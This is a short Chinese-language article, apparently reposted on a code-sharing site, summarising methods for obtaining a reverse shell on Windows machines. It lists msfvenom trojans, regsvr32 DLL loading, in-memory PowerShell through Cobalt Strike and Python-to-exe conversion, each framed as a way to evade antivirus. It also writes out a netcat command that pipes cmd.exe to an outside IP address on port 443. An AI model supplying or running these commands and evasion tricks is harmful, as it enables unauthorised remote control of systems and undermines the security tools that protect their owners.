Windows反彈shell方法總結


一、運行exe程序反彈shell

需要先生成exe木馬,然后將exe文件上傳到服務器上,最后在服務器上運行該文件。可使用msfvenom生成exe木馬。

二、加載dll文件反彈shell

需要先生成dll文件,然后使用regsvr32.exe加載dll。可使用msfvenom生成dll文件。

三、PowerShell反彈shell

通過執行PowerShell代碼反彈shell能有效繞過殺毒軟件對攔截,因為通常將PowerShell代碼直接加載到內存中,不會在磁盤上創建任何惡意文件,所以能繞過殺軟的監控。可使用Cobalt Strike的Web腳本投遞功能反彈shell。

四、腳本語言反彈shell

可通過運行PHP、Python、Shell等腳本語言程序反彈shell。可使用msfvenom生成各種語言的腳本程序。

五、Python腳本轉換成exe反彈shell

將Python腳本轉換成exe程序能有效繞過殺毒軟件的檢測實現免殺。

六、netcat反彈shell

在VPS上監聽端口:netcat -l -p 443

在被控服務器上運行:netcat.exe -t -e cmd.exe 16.79.5.26 443

...


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM